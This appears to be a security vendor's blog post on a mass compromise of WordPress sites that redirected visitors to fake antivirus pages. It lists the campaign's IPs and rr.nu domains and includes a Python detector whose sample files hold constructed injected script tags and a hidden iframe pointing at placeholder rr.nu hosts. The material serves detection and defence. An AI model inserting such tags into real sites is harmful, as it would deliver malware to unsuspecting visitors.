Latest Mass Compromise of WordPress sites – More Details

We are getting lots of questions about the latest mass compromise targeting WordPress sites (redirecting visitors to fake AV pages), which has affected over 30,000 domains.

The first question is how these sites are getting hacked. In all the cases we analysed, the site was running either an outdated version of WordPress or an outdated plugin. We can safely rule out a new vulnerability in WordPress itself.

We also posted about it a week ago when we detected this malware campaign using .rr.nu domains.

As we promised in the previous post, this is an update to what we are seeing.

More Details

  • The malicious domains are still pointing to 194.28.114.103 and 194.28.114.102 (the same IPs used by the group behind the sweepstakesandcontestsdo.com and infoitpoweringgathering.com attacks)
  • More than 200 different .rr.nu domains are being used
  • We have identified more than 500 variations of the injected URL, each pointing to a random domain name under rr.nu (a second-level domain under .nu, not a TLD of its own)
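The indicators above (two hosting IPs, hundreds of random labels under rr.nu) are enough to write a simple offline check for your own files. The script below is an added example, not SiteCheck and not code from the original post: it searches a set of file contents for http(s) URLs whose host is a subdomain of rr.nu, reports which hosts each file references, and can check whether a host resolves to one of the two IPs named above. The sample files, the injected tags and the rr.nu labels in them are constructed placeholders for illustration, not real indicators from the campaign.

```python
"""Offline detector for injected rr.nu URLs of the kind described in this post.

Added example, not Sucuri's scanner. File contents and the injected tags are
constructed; the rr.nu labels are placeholders, not IOCs from the campaign.
"""
import re
import socket
from typing import Callable, Dict, List, Optional

# IOCs quoted in the post: the two IPs the rr.nu domains point to.
KNOWN_BAD_IPS = {"194.28.114.102", "194.28.114.103"}

# http(s) URL whose host is a subdomain of rr.nu. The negative look-ahead stops
# "x.rr.nu.example.com" from matching on its "x.rr.nu" prefix.
RR_NU_URL = re.compile(
    r"""https?://((?:[a-z0-9-]+\.)+rr\.nu)(?![a-z0-9.-])(?::\d+)?([^\s"'<>)]*)""",
    re.IGNORECASE,
)


def find_rr_nu_urls(content: str) -> List[Dict[str, str]]:
    """Return every rr.nu URL found in a blob of HTML/PHP/JS, host lower-cased."""
    return [
        {"host": m.group(1).lower(), "url": m.group(0)}
        for m in RR_NU_URL.finditer(content)
    ]


def scan_files(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each file that references rr.nu to the sorted set of hosts it points at."""
    report: Dict[str, List[str]] = {}
    for path, content in files.items():
        hosts = sorted({hit["host"] for hit in find_rr_nu_urls(content)})
        if hosts:
            report[path] = hosts
    return report


def host_on_known_bad_ip(
    host: str, resolve: Optional[Callable[[str], List[str]]] = None
) -> bool:
    """True if any A record for `host` is one of the IPs named in the post.

    `resolve` is injectable so the check can run offline. The default does a
    real DNS lookup and treats resolution failure as "not known bad", since a
    domain may already be dead or sinkholed.
    """
    if resolve is None:
        def lookup(name: str) -> List[str]:
            try:
                return socket.gethostbyname_ex(name)[2]
            except socket.gaierror:
                return []
        resolve = lookup
    return any(ip in KNOWN_BAD_IPS for ip in resolve(host))


# Constructed sample tree: two infected files and one clean one. The rr.nu
# labels are made up; a real campaign uses many random labels.
SAMPLE_FILES = {
    "index.php": (
        "<?php /* injected */ echo '<script src=\"http://4b7c2e.rr.nu/nl.php?p=d\"></script>'; ?>\n"
        "<?php define('WP_USE_THEMES', true); require('./wp-blog-header.php'); ?>\n"
    ),
    "wp-content/themes/twentyten/footer.php": (
        '<iframe src="http://q91xk.rr.nu/stat.php" width="1" height="1"></iframe>\n'
        '<script src="HTTP://4B7C2E.RR.NU/nl.php?p=d"></script>\n'
        "</body></html>\n"
    ),
    "wp-content/themes/twentyten/header.php": (
        '<link rel="stylesheet" href="https://example.com/style.css">\n'
        "<!-- rr.nu is mentioned here without a URL, so this is not a hit -->\n"
    ),
}


def demo() -> Dict[str, List[str]]:
    """Scan the constructed sample tree and print one line per infected file."""
    report = scan_files(SAMPLE_FILES)
    for path, hosts in report.items():
        print(f"{path}: {', '.join(hosts)}")
    return report


if __name__ == "__main__":
    demo()
```

To run this against a real site, read the theme, plugin and core files from disk into the dictionary that `scan_files` takes and pass every reported host to `host_on_known_bad_ip`. Treat a URL hit as suspicious rather than conclusive: the post only establishes that the attackers use many rr.nu subdomains, not that every rr.nu name is malicious, so a hit that also resolves to 194.28.114.102 or .103 is the stronger signal.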

If you are not sure whether your site is infected, run a free website malware scan with SiteCheck.

About Daniel Cid

Daniel is the Founder & CTO of Sucuri and also the founder of the open source project OSSEC HIDS. His interests range from intrusion detection and log analysis (log-based intrusion detection) to web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid